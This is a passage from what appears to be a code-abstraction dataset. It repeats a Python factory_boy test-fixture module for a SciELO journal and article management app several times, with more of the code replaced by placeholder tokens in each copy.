journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass LanguageFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueTitleFactory(factory.Factory):\n <docstring token>\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueTitleFactory(factory.Factory):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass UserProfileFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi 